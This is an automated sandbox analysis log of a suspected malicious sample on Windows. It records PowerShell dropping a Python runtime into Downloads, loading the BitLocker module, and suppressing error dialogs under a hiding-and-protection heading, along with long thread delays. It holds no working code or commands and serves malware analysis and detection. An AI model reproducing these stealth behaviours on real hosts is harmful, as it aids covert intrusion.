Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_tkinter.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_testinternalcapi.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\select.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_bz2.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\pyexpat.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\sqlite3.dllJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_ctypes.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_ssl.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_socket.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\Python\Python312\DLLs\_wmi.pydJump to dropped file
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2316
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7513
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1220
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8597
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\Downloads\Python\Python312\DLLs\_queue.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\Downloads\Python\Launcher\pyshellext.amd64.dllJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\Downloads\Python\Python312\DLLs\_asyncio.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\Downloads\Python\Python312\DLLs\_sqlite3.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\Downloads\Python\Python312\DLLs\_zoneinfo.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\Downloads\Python\Python312\DLLs\tk86t.dllJump to dropped file
